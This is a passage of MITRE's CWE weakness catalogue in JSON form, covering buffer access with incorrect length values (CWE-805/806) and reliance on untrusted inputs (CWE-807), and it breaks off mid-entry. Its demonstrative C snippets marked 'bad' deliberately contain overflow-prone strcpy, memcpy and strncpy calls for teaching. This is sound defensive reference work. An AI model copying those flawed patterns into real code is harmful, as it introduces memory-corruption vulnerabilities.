CAPTCHA."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":21,"Entry_Name":"Insufficient Anti-Automation"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-731"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-15","Submission_Comment":"New entry to handle anti-automation as identified in WASC."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"805":{"attr":{"@_ID":"805","@_Name":"Buffer Access with Incorrect Length Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a sequential operation to read or write a buffer, but it uses an incorrect length value that causes it to access memory that is outside of the bounds of the buffer.","Extended_Description":"When the length value exceeds the size of the destination, a buffer overflow could occur.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Resultant"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Assembly","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Read Memory","Modify Memory","Execute Unauthorized Code or Commands"],"Note":"Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy. This can often be used to subvert any other security service."},{"Scope":"Availability","Impact":["Modify Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)"],"Note":"Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"Detection techniques for buffer-related errors are more mature than for most other weakness types."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate","Effectiveness_Notes":"Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring manual methods to diagnose the underlying problem."},{"attr":{"@_Detection_Method_ID":"DM-9"},"Method":"Manual Analysis","Description":"Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.","Be wary that a language\'s interface to native code may still be subject to overflows, even if the language itself is theoretically safe."]}},{"attr":{"@_Mitigation_ID":"MIT-4.1"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions."]},"Effectiveness_Notes":"This is not a complete solution, since many buffer overflows are not related to strings."},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-9"},"Phase":"Implementation","Description":{"xhtml:p":"Consider adhering to the following rules when allocating and managing an application\'s memory:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Double check that the buffer is as large as specified.","When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.","Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space.","If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions."]}}}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["This function allocates a buffer of 64 bytes to store the hostname under the assumption that the maximum length value of hostname is 64 bytes, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.","Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-114"},"Intro_Text":"In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int returnChunkSize(void *) {}int main() {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["","","","","",""],"xhtml:i":["/* if chunk info is valid, return the size of usable memory,","* else, return -1 to indicate an error","*/"]}},{"#text":"...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},"Body_Text":"If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788)."},{"Intro_Text":"In the following example, the source character string is copied to the dest character string using the method strncpy.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...char source[21] = \\"the character string\\";char dest[12];strncpy(dest, source, sizeof(source)-1);...","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...char source[21] = \\"the character string\\";char dest[12];strncpy(dest, source, sizeof(dest)-1);...","xhtml:br":["","","",""]}}],"Body_Text":"However, in the call to strncpy the source character string is used within the sizeof call to determine the number of characters to copy. This will create a buffer overflow as the size of the source character string is greater than the dest character string. The dest character string should be used within the sizeof call to ensure that the correct number of characters are copied, as shown below."},{"Intro_Text":"In this example, the method outputFilenameToLog outputs a filename to a log file. The method arguments include a pointer to a character string containing the file name and an integer for the number of characters in the string. The filename is copied to a buffer where the buffer size is set to a maximum size for inputs to the log file. The method then calls another method to save the contents of the buffer to the log file.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define LOG_INPUT_SIZE 40int outputFilenameToLog(char *filename, int length) {}","xhtml:br":["","",""],"xhtml:i":"// saves the file name to a log file","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buf[LOG_INPUT_SIZE];strncpy(buf, filename, length);success = saveToLogFile(buf);return success;","xhtml:br":["","","","","","","","","","",""],"xhtml:i":["// buffer with size set to maximum size for input to log file","// copy filename to buffer","// save to log file"]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...strncpy(buf, filename, sizeof(buf)-1);...","xhtml:br":["","",""],"xhtml:i":"// copy filename to buffer"}}],"Body_Text":"However, in this case the string copy method, strncpy, mistakenly uses the length method argument to determine the number of characters to copy rather than using the size of the local character string, buf. This can lead to a buffer overflow if the number of characters contained in character string pointed to by filename is larger then the number of characters allowed for the local character string. The string copy method should use the buf character string within a sizeof call to ensure that only characters up to the size of the buf array are copied to avoid a buffer overflow, as shown below."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2011-1959","Description":"Chain: large length value causes buffer over-read (CWE-126)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1959"},{"Reference":"CVE-2011-1848","Description":"Use of packet length field to make a calculation, then copy into a fixed-size buffer","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1848"},{"Reference":"CVE-2011-0105","Description":"Chain: retrieval of length value from an uninitialized memory location","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0105"},{"Reference":"CVE-2011-0606","Description":"Crafted length value in document reader leads to buffer overflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0606"},{"Reference":"CVE-2011-0651","Description":"SSL server overflow when the sum of multiple length fields exceeds a given value","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0651"},{"Reference":"CVE-2010-4156","Description":"Language interpreter API function doesn\'t validate length argument, leading to information exposure","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4156"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Guarantee that library functions do not form invalid pointers","Mapping_Fit":"Imprecise"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"100"}},{"attr":{"@_CAPEC_ID":"256"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 6, &#34;Why ACLs Are Important&#34; Page 171"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-59"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-741"}},{"attr":{"@_External_Reference_ID":"REF-57"}},{"attr":{"@_External_Reference_ID":"REF-56"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-64"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"}]}},"806":{"attr":{"@_ID":"806","@_Name":"Buffer Access Using Size of Source Buffer","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses the size of a source buffer when reading from or writing to a destination buffer, which may cause it to access memory that is outside of the bounds of the buffer.","Extended_Description":"When the size of the destination is smaller than the size of the source, a buffer overflow could occur.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"805","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Resultant"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["Modify Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)"],"Note":"Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Read Memory","Modify Memory","Execute Unauthorized Code or Commands"],"Note":"Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"When the consequence is arbitrary code execution, this can often be used to subvert any other security service."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. Examples include the Safe C String Library (SafeStr) by Viega, and the Strsafe.h library from Microsoft. This is not a complete solution, since many buffer overflows are not related to strings."},{"Phase":"Build and Compilation","Description":"Use automatic buffer overflow detection mechanisms that are offered by certain compilers or compiler extensions. Examples include StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. This is not necessarily a complete solution, since these canary-based mechanisms only detect certain types of overflows. In addition, the result is still a denial of service, since the typical response is to exit the application."},{"Phase":"Implementation","Description":"Programmers should adhere to the following rules when allocating and managing their applications memory: Double check that your buffer is as large as you specify. When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string. Check buffer boundaries if calling this function in a loop and make sure there is no danger of writing past the allocated space. Truncate all input strings to a reasonable length before passing them to the copy and concatenation functions"},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"Phase":["Build and Compilation","Operation"],"Description":"Most mitigating technologies at the compiler or OS level to date address only a subset of buffer overflow problems and rarely provide complete protection against even that subset. It is good practice to implement strategies to increase the workload of an attacker, such as leaving the attacker to guess an unknown value that changes every program execution."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following example, the source character string is copied to the dest character string using the method strncpy.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...char source[21] = \\"the character string\\";char dest[12];strncpy(dest, source, sizeof(source)-1);...","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...char source[21] = \\"the character string\\";char dest[12];strncpy(dest, source, sizeof(dest)-1);...","xhtml:br":["","","",""]}}],"Body_Text":"However, in the call to strncpy the source character string is used within the sizeof call to determine the number of characters to copy. This will create a buffer overflow as the size of the source character string is greater than the dest character string. The dest character string should be used within the sizeof call to ensure that the correct number of characters are copied, as shown below."},{"Intro_Text":"In this example, the method outputFilenameToLog outputs a filename to a log file. The method arguments include a pointer to a character string containing the file name and an integer for the number of characters in the string. The filename is copied to a buffer where the buffer size is set to a maximum size for inputs to the log file. The method then calls another method to save the contents of the buffer to the log file.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define LOG_INPUT_SIZE 40int outputFilenameToLog(char *filename, int length) {}","xhtml:br":["","",""],"xhtml:i":"// saves the file name to a log file","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buf[LOG_INPUT_SIZE];strncpy(buf, filename, length);success = saveToLogFile(buf);return success;","xhtml:br":["","","","","","","","","","",""],"xhtml:i":["// buffer with size set to maximum size for input to log file","// copy filename to buffer","// save to log file"]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...strncpy(buf, filename, sizeof(buf)-1);...","xhtml:br":["","",""],"xhtml:i":"// copy filename to buffer"}}],"Body_Text":"However, in this case the string copy method, strncpy, mistakenly uses the length method argument to determine the number of characters to copy rather than using the size of the local character string, buf. This can lead to a buffer overflow if the number of characters contained in character string pointed to by filename is larger then the number of characters allowed for the local character string. The string copy method should use the buf character string within a sizeof call to ensure that only characters up to the size of the buf array are copied to avoid a buffer overflow, as shown below."}]},"Affected_Resources":{"Affected_Resource":"Memory"},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-56"}},{"attr":{"@_External_Reference_ID":"REF-57"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-59"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-64"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2010-01-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}]}},"807":{"attr":{"@_ID":"807","@_Name":"Reliance on Untrusted Inputs in a Security Decision","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application uses a protection mechanism that relies on the existence or values of an input, but the input can be modified by an untrusted actor in a way that bypasses the protection mechanism.","Extended_Description":{"xhtml:p":["Developers may assume that inputs such as cookies, environment variables, and hidden form fields cannot be modified. However, an attacker could change these inputs using customized clients or other attacks. This change might not be detected. When security decisions such as authentication and authorization are made based on the values of these inputs, attackers can bypass the security of the software.","Without sufficient encryption, integrity checking, or other mechanism, any input that originates from an outsider cannot be trusted."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Availability","Other"],"Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity","Varies by Context"],"Note":"Attackers can bypass the security decision to access whatever is being protected. The consequences will depend on the associated functionality, but they can range from granting additional privileges to untrusted users to bypassing important security checks. Ultimately, this weakness may lead to exposure or modification of sensitive data, system crash, or execution of arbitrary code."}},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-10"},"Method":"Manual Static Analysis","Description":"Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints.","Effectiveness":"High","Effectiveness_Notes":"The effectiveness and speed of manual analysis will be reduced if the there is not a centralized security mechanism, and the security logic is widely distributed throughout the software."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR 